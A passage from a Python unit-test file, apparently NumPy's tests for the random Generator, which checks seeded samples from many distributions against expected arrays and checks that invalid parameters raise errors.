assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
